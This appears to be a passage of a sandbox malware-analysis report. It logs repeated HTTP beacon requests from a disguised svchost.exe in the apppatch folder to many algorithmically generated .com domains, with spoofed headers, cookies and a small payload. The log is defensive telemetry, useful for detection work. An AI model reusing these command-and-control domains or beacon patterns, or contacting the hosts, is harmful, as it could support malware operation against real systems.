      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww3.galyqaz.com Connection: Keep-Alive Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Content-Length: 6 Cookie: btst=aa122ab46703e7e3b9d2518b0ebc8c78|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=162891e75d1d854fb9d05e52998b5935|8.46.123.33|1724431621|1724431621|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Cookie: btst=0e9c6b135bbf78b20bee3c60ff917523|8.46.123.33|1724431636|1724431636|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1|8.46.123.33|1724431658|1724431658|0|1|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
      Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
